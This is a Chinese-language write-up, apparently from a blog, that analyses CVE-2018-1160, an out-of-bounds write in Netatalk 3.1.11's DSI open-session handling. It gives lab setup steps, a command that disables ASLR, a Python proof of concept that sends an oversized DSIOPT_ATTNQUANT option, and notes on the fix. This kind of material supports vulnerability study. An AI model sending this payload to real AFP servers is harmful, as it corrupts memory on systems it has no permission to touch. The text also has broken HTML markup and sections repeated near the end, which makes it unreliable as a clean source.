Netatalk CVE-2018-1160 越界写漏洞分析与利用<\/h1>

漏洞概述<\/h2>
CVE-2018-1160是Netatalk 3.1.11版本中存在的一个越界写漏洞。该漏洞存在于DSI (Data Stream Interface)协议处理过程中，当处理`DSIOPT_ATTNQUANT<\/code>选项时，由于缺乏对数据长度的有效验证，导致可以越界写入内存。<\/p>`

环境搭建<\/h2>
依赖安装<\/h3>
sudo apt install libcrack2-dev
<\/span><\/span>sudo apt install libgssapi-krb5-2
<\/span><\/span>sudo apt install libgssapi3-heimdal
<\/span><\/span>sudo apt install libgssapi-perl
<\/span><\/span>sudo apt-get install libkrb5-dev
<\/span><\/span>sudo apt-get install libtdb-dev
<\/span><\/span>sudo apt-get install libevent-dev
<\/span><\/span><\/code><\/pre>源码编译<\/h3>


下载带有漏洞的Netatalk 3.1.11版本：<\/p>
https:\/\/sourceforge.net\/projects\/netatalk\/files\/netatalk\/3.1.11\/
<\/code><\/pre>
<\/li>

编译安装：<\/p>
<\/li>
<\/ol>
.\/configure --with-init-style=<\/span>debian-systemd --without-libevent --without-tdb --with-cracklib --enable-krbV-uam --with-pam-confdir=<\/span>\/etc\/pam.d --with-dbus-daemon=<\/span>\/usr\/bin\/dbus-daemon --with-dbus-sysconf-dir=<\/span>\/etc\/dbus-1\/system.d --with-tracker-pkgconfig-version=<\/span>1.0
<\/span><\/span>make
<\/span><\/span>sudo make install
<\/span><\/span><\/code><\/pre>服务配置<\/h3>
编辑配置文件\/usr\/local\/etc\/afp.conf<\/code>：<\/p>
[Global]<\/span>
<\/span><\/span>mimic model<\/span> =<\/span> Xserve<\/span>
<\/span><\/span>log level<\/span> =<\/span> default:warn<\/span>
<\/span><\/span>log file<\/span> =<\/span> \/var\/log\/afpd.log<\/span>
<\/span><\/span>hosts allow<\/span> =<\/span> 192.168.245.0\/24<\/span>
<\/span><\/span>hostname<\/span> =<\/span> ubuntu<\/span>
<\/span><\/span>uam list<\/span> =<\/span> uams_dhx.so uams_dhx2.so<\/span>
<\/span><\/span>
<\/span><\/span>[Homes]<\/span>
<\/span><\/span>basedir regex<\/span> =<\/span> \/tmp<\/span>
<\/span><\/span>
<\/span><\/span>[NAS-FILES]<\/span>
<\/span><\/span>path<\/span> =<\/span> \/tmp<\/span>
<\/span><\/span><\/code><\/pre>服务启动<\/h3>
sudo systemctl enable avahi-daemon
<\/span><\/span>sudo systemctl enable netatalk
<\/span><\/span>sudo systemctl start avahi-daemon
<\/span><\/span>sudo systemctl start netatalk
<\/span><\/span><\/code><\/pre>调试准备<\/h3>
关闭ASLR以便调试：<\/p>
echo 0<\/span> > \/proc\/sys\/kernel\/randomize_va_space
<\/span><\/span><\/code><\/pre>漏洞分析<\/h2>
关键数据结构<\/h3>
DSI头部结构定义：<\/p>
#define DSI_BLOCKSIZ 16
<\/span><\/span><\/span><\/span>struct<\/span> dsi_block {
<\/span><\/span>    uint8_t<\/span> dsi_flags;     \/* packet type: request or reply *\/<\/span>
<\/span><\/span>    uint8_t<\/span> dsi_command;   \/* command *\/<\/span>
<\/span><\/span>    uint16_t<\/span> dsi_requestID; \/* request ID *\/<\/span>
<\/span><\/span>    union<\/span> {
<\/span><\/span>        uint32_t<\/span> dsi_code; \/* error code *\/<\/span>
<\/span><\/span>        uint32_t<\/span> dsi_doff; \/* data offset *\/<\/span>
<\/span><\/span>    } dsi_data;
<\/span><\/span>    uint32_t<\/span> dsi_len;      \/* total data length *\/<\/span>
<\/span><\/span>    uint32_t<\/span> dsi_reserved; \/* reserved field *\/<\/span>
<\/span><\/span>};
<\/span><\/span><\/code><\/pre>漏洞触发流程<\/h3>


dsi_stream_receive<\/code>函数处理客户端请求：<\/p>

读取16字节的头部信息<\/li>
从头部提取dsi_len<\/code>字段，表示后续数据长度<\/li>
将dsi_len<\/code>与server_quantum<\/code>(默认0x100000)比较取较小值作为cmdlen<\/code><\/li>
将后续数据读入dsi->commands<\/code>缓冲区<\/li>
<\/ul>
<\/li>

漏洞点位于dsi_opensession<\/code>函数中处理DSIOPT_ATTNQUANT<\/code>选项的代码：<\/p>
case<\/span> DSIOPT_ATTNQUANT:
<\/span><\/span>    memcpy(&<\/span>dsi-><\/span>attn_quantum, dsi-><\/span>commands +<\/span> i +<\/span> 1<\/span>, dsi-><\/span>commands[i]);
<\/span><\/span>    break<\/span>;
<\/span><\/span><\/code><\/pre>
dsi->commands[i]<\/code>直接从客户端数据中获取，未经验证<\/li>
dsi->attn_quantum<\/code>是4字节整数，但可以写入最多255字节(0xFF)<\/li>
导致越界写入，覆盖后续数据结构<\/li>
<\/ul>
<\/li>
<\/ol>
内存布局<\/h3>
dsi->commands<\/code>缓冲区默认大小0x101000：<\/p>
0x7ffff7ed4000 0x7ffff7fd5000 rw-p 101000 0
<\/code><\/pre>
漏洞利用<\/h2>
POC构造<\/h3>
#!\/usr\/bin\/python<\/span>
<\/span><\/span># -*- coding: UTF-8 -*-<\/span>
<\/span><\/span>import<\/span> socket
<\/span><\/span>import<\/span> struct
<\/span><\/span>
<\/span><\/span>ip =<\/span> "192.168.245.168"<\/span>
<\/span><\/span>port =<\/span> 548<\/span>
<\/span><\/span>
<\/span><\/span>sock =<\/span> socket.<\/span>socket(socket.<\/span>AF_INET, socket.<\/span>SOCK_STREAM)
<\/span><\/span>sock.<\/span>connect((ip, port))
<\/span><\/span>
<\/span><\/span># 设置commands, 溢出dsi->attn_quantum<\/span>
<\/span><\/span>commands =<\/span> "<\/span>\x01<\/span>"<\/span>       # DSIOPT_ATTNQUANT选项的值<\/span>
<\/span><\/span>commands +=<\/span> "<\/span>\x80<\/span>"<\/span>       # 数据长度<\/span>
<\/span><\/span>commands +=<\/span> "<\/span>\xaa<\/span>"<\/span> *<\/span> 0x80<\/span>  # 数据<\/span>
<\/span><\/span>
<\/span><\/span>header =<\/span> "<\/span>\x00<\/span>"<\/span>          # "request" flag, dsi_flags<\/span>
<\/span><\/span>header +=<\/span> "<\/span>\x04<\/span>"<\/span>         # open session command, dsi_command<\/span>
<\/span><\/span>header +=<\/span> "<\/span>\x00\x01<\/span>"<\/span>     # request id, dsi_requestID<\/span>
<\/span><\/span>header +=<\/span> "<\/span>\x00\x00\x00\x00<\/span>"<\/span>  # dsi_data<\/span>
<\/span><\/span>header +=<\/span> struct.<\/span>pack(">I"<\/span>, len(commands))  # dsi_len<\/span>
<\/span><\/span>header +=<\/span> "<\/span>\x00\x00\x00\x00<\/span>"<\/span>  # reserved<\/span>
<\/span><\/span>header +=<\/span> commands
<\/span><\/span>
<\/span><\/span>sock.<\/span>sendall(header)
<\/span><\/span>print sock.<\/span>recv(1024<\/span>)
<\/span><\/span><\/code><\/pre>POC分析<\/h3>


设置DSI头部：<\/p>

dsi_command<\/code>设为0x04(open session)<\/li>
dsi_len<\/code>设为commands长度<\/li>
<\/ul>
<\/li>

构造恶意commands：<\/p>

第一个字节0x01表示DSIOPT_ATTNQUANT<\/code>选项<\/li>
第二个字节0x80表示数据长度<\/li>
后续填充0x80个0xaa作为数据<\/li>
<\/ul>
<\/li>

触发漏洞时：<\/p>

从dsi->commands<\/code>读取长度0x80<\/li>
复制0x80字节数据到dsi->attn_quantum<\/code>(4字节)<\/li>
覆盖后续内存区域<\/li>
<\/ul>
<\/li>
<\/ol>
漏洞修复<\/h2>
修复的关键点在于对dsi->commands[i]<\/code>长度的验证，确保不超过目标缓冲区大小。<\/p>
总结<\/h2>
该漏洞的根本原因是：<\/p>

从不可信输入(dsi->commands[i]<\/code>)获取长度值<\/li>
未验证长度是否超过目标缓冲区(dsi->attn_quantum<\/code>)大小<\/li>
导致越界写入，可能覆盖关键数据结构指针<\/li>
<\/ol>
参考<\/h2>

https:\/\/medium.com\/tenable-techblog\/exploiting-an-18-year-old-bug-b47afe54172<\/li>
<\/ul>

Netatalk CVE-2018-1160 越界写漏洞分析与利用<\/h1>

漏洞概述<\/h2> CVE-2018-1160是Netatalk 3.1.11版本中存在的一个越界写漏洞。该漏洞存在于DSI (Data Stream Interface)协议处理过程中，当处理DSIOPT_ATTNQUANT<\/code>选项时，由于缺乏对数据长度的有效验证，导致可以越界写入内存。<\/p>

漏洞分析<\/h2>

漏洞利用<\/h2>

漏洞修复<\/h2> 修复的关键点在于对dsi->commands[i]<\/code>长度的验证，确保不超过目标缓冲区大小。<\/p>

参考<\/h2> https:\/\/medium.com\/tenable-techblog\/exploiting-an-18-year-old-bug-b47afe54172<\/li> <\/ul>

漏洞概述<\/h2>
CVE-2018-1160是Netatalk 3.1.11版本中存在的一个越界写漏洞。该漏洞存在于DSI (Data Stream Interface)协议处理过程中，当处理`DSIOPT_ATTNQUANT<\/code>选项时，由于缺乏对数据长度的有效验证，导致可以越界写入内存。<\/p>`

漏洞修复<\/h2>
修复的关键点在于对`dsi->commands[i]<\/code>长度的验证，确保不超过目标缓冲区大小。<\/p>`

参考<\/h2>

https:\/\/medium.com\/tenable-techblog\/exploiting-an-18-year-old-bug-b47afe54172<\/li> <\/ul>